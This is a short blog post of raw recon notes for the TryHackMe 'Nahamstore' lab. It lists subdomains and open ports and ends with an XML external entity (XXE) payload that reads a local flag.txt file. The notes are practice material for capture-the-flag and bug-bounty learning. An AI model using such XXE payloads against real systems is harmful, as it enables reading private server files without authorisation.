KickAss101

Writeups/Walkthroughs for n00bs by a n00b :)

Source Code
16 August 2022

Nahamstore Recon Notes

Not a walkthrough or writeup. Just my raw recon notes and vulnerabilities

Root domains

Web Technologies


nahamstore.thm

Ports: 22,80,8000

www.nahamstore.thm, shop.nahamstore.thm -> nahamstore.thm

internal-api.nahamstore.thm

nahamstore.thm:8000

marketing.nahamstore.thm

nahamstore-2020-dev.nahamstore.thm [API]

stock.nahamstore.thm [API]


<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<data>
    <X-Token>
        &xxe;
    </X-Token>
</data>
tags: bug - bounty - tryhackme